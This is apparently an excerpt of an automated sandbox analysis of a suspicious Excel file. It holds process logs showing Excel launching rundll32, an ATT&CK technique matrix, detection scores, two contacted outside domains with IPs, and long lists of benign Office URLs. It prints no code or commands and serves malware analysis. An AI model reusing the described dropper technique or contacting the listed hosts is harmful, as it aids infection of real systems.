Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 00000004.00000002.276359438.0000000004C10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.271815932.00000000049A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000004.00000002.276359438.0000000004C10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.271815932.00000000049A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000004.00000002.276359438.0000000004C10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.271815932.00000000049A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000004.00000002.276359438.0000000004C10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.271815932.00000000049A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
85095f36_by_Libranalysis.xls7%VirustotalBrowse
85095f36_by_Libranalysis.xls11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-user.acompli.net0%URL Reputationsafe
https://powerlift-user.acompli.net0%URL Reputationsafe
https://powerlift-user.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalse
    unknown
    fcventasyservicios.cl
    192.185.32.232
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
        high
        https://login.microsoftonline.com/2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
          high
          https://shell.suite.office.com:14432ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
              high
              https://autodiscover-s.outlook.com/2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                  high
                  https://cdn.entity.2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/query2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                        high
                        https://powerlift.acompli.net2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v12ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                          high
                          https://cortana.ai2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspx2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.com2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                    high
                                    https://api.aadrm.com/2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                          high
                                          https://cr.office.com2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControl2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                              high
                                              https://ecs.office.com/config/v2/Office2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                high
                                                https://graph.ppe.windows.net2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-user.acompli.net2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplate2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplate2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetect2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
